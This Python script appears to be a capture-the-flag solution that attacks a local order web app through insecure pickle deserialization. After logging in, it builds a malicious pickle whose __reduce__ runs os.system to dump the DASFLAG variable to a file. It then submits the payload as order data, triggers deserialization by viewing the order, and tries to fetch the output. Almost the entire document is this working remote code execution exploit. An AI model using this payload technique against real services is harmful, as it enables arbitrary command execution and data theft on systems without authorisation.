import pickle
import base64
import requests
import os
import time

url = "http://localhost:42550"

# Step 1: 登录
session = requests.Session()
login_response = session.post(f"{url}/login", data={'username': 'test', 'password': 'test'})
print("登录状态:", "成功" if session.cookies.get_dict() else "失败")

# Step 2: 创建恶意订单
class RCE:
    def __reduce__(self):
        # 写入 flag 到可访问的位置
        return (os.system, ('echo $DASFLAG > /tmp/flag_output.txt',))

payload = pickle.dumps(RCE())
order_data = base64.b64encode(payload).decode()
print(f"Payload 长度: {len(order_data)}")

response = session.post(f"{url}/create_order", data={'order_data': order_data})
print("创建订单响应:", response.text)

if response.status_code == 200:
    order_id = response.json()['order_id']
    print(f"订单ID: {order_id}")
    
    # Step 3: 触发反序列化
    time.sleep(1)
    view_response = session.get(f"{url}/view_order/{order_id}")
    print("查看订单状态码:", view_response.status_code)
    
    # Step 4: 检查 flag 是否写入
    time.sleep(1)
    try:
        flag_response = session.get(f"{url}/static/flag_output.txt")
        print("Flag 内容:", flag_response.text)
    except:
        print("无法读取 flag 文件")
else:
    print("创建订单失败")